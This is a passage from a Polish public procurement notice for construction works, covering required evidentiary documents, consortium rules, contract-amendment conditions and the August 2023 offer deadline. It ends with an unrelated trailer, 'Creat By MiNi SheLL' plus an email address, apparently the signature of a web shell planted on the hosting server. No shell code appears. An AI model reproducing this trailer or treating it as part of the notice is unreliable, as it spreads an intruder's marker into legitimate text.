o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2021 r. poz. 275), z innym<br/>Wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami<br/>lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy<br/>kapitałowej (wzór oświadczenia o przynależności lub braku przynależności do tej grupy kapitałowej stanowi załącznik nr 5 do SWZ),<br/>2. odpisu lub informacje z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wpieraniu agresji<br/>na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz.U. 2022 poz. 835). Wykonawca nie jest zobowiązany do<br/>złożenia dokumentów, o których mowa w zdaniu poprzednim, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, o ile Wykonawca/podmiot udostępniający zasoby dostarczy dane umożliwiające dostęp do tych<br/>dokumentów.<br/>Zgodnie z rozdziałem 8 SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Na<br/>potwierdzenie spełnienia warunku opisanego w ust. 7.1. pkt 4 lit. a –<br/>„wykazu robót budowlanych” wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane<br/>zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot,<br/>na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów - inne odpowiednie dokumenty (formularz wykazu znajduje się w Załączniku nr 7 do SWZ).<br/>W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w „Wykazie robót budowlanych”,<br/>zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.<br/>W razie konieczności, szczególnie gdy wykaz lub dowody budzą wątpliwości Zamawiającego lub gdy z poświadczenia albo z innego<br/>dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego roboty budowlane lub usługi były lub miały zostać wykonane, o<br/>przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu.<br/>2) Na potwierdzenie spełniania warunku opisanego w ust. 7.1 pkt 4 lit. b – wykazu osób, skierowanych przez Wykonawcę do<br/>realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kontrolę jakości lub kierowanie robotami budowlanymi,<br/>wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi<br/>osobami (formularz wykazu znajduje się w Załączniku nr 6 do SWZ).<br/>3) Na potwierdzenie spełnienia warunku opisanego w ust. 7.1. pkt 3 – informacji z banku lub spółdzielczej kasy oszczędnościowokredytowej<br/>potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie<br/>wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>8.4. Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 112 ust. 2 PZP, polega na zasobach innych<br/>podmiotów na zasadach określonych w art. 118 PZP, Wykonawca będzie zobowiązany do złożenia wraz z ofertą:<br/>1) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów.<br/>Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa wyżej, potwierdza, że stosunek łączący Wykonawcę z<br/>podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów<br/>Zgodnie z rozdziałem 8 SWZ</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>11.2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z warunków udziału w<br/>postępowaniu określonych w rozdziale 7 ust. 1 SWZ winien spełniać co najmniej jeden z tych wykonawców albo wszyscy ci<br/>Wykonawcy wspólnie. Żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać<br/>wykluczeniu z postępowania.<br/>11.3. W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum):<br/>a) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia;<br/>b) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi<br/>wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres<br/>umocowania;<br/>c) oświadczenie o spełnianiu warunków udziału w postępowaniu składają Wykonawcy wspólnie lub Wykonawca, który dany<br/>warunek spełnia. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z warunków<br/>udziału w postępowaniu określonych w rozdziale 7 ust 1 SWZ winien spełniać co najmniej jeden z tych Wykonawców albo<br/>Ci wszyscy Wykonawcy wspólnie.<br/>d) oświadczenie o braku podstaw do wykluczenia o których mowa w ust. 8.1. obowiązany będzie złożyć każdy z<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>e) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za<br/>wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy;<br/>f) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera),<br/>upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla<br/>wszystkich konsorcjantów;<br/>g) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od<br/>wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>h) Zamawiający informuje o treści przepisu art. 117 ust. 3 PZP, zgodnie z którym w odniesieniu do warunków dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>W związku z powyższym zgodnie z art. 117 ust. 4 PZP Wykonawca jest zobowiązany załączyć do oferty podmiotowy środek<br/>dowodowy w postaci oświadczenia, z którego wynika, które usługi wykonają poszczególni Wykonawcy. Wzór stosownego<br/>oświadczenia został zawarty w Formularzu Oferty (stanowiącym Załącznik nr 1 do SWZ) i Zamawiający zaleca złożyć to<br/>oświadczenie właśnie w tym Formularzu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana umowy nastąpić może w następujących sytuacjach: <br/>1)	w przypadku wystąpienia okoliczności bezwzględnie od Wykonawcy niezależnych, powodujących, że nie jest możliwe dochowanie terminów określonych w umowie lub harmonogramie. Okoliczności, o których mowa powyżej muszą być przez Wykonawcę udowodnione na piśmie przekazanym Zamawiającemu na co najmniej 7 dni przed danym terminem, określonym w zawartej umowie lub załączonym do niej harmonogramie. Zmiana terminu nie może przekraczać 50% terminu realizacji wskazanego w umowie. W takim przypadku termin może zostać odpowiednio przedłużony o czas, jaki jest niezbędny dla wykonania obowiązku umownego; <br/>2)	w przypadku gdy Wykonawcę, któremu Zamawiający udzielił zamówienia, ma zastąpić nowy Wykonawca w wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy. <br/>3)	wystąpienia warunków pogodowych, skutkujących zmianą warunków gruntowo-wodnych mających wpływa na brak możliwości prowadzenia robót budowlanych, powodujących przestój powyżej kolejnych 7 dni roboczych.<br/>4) konieczności wykonania robót dodatkowych, nieobjętych przedmiotem niniejszej Umowy, gdy zmiana Wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych, zmiana Wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów dla Zamawiającego oraz wartość zmiany nie przekracza 50% wartości Umowy;<br/>5)	konieczności zmiany Umowy spowodowanej okolicznościami, których Zamawiający, działając z należytą starannością, nie mógł przewidzieć oraz wartość zmiany nie przekracza 50% wartości Umowy.<br/>Szczegółowe informacje zawiera rozdział 18 Istotnych postanowień umownych (załącznika nr 8 do SWZ) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-08 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pomocą platformy e-zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-08 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-09-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Szczegółowe informacje dotyczące postępowania zawiera SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com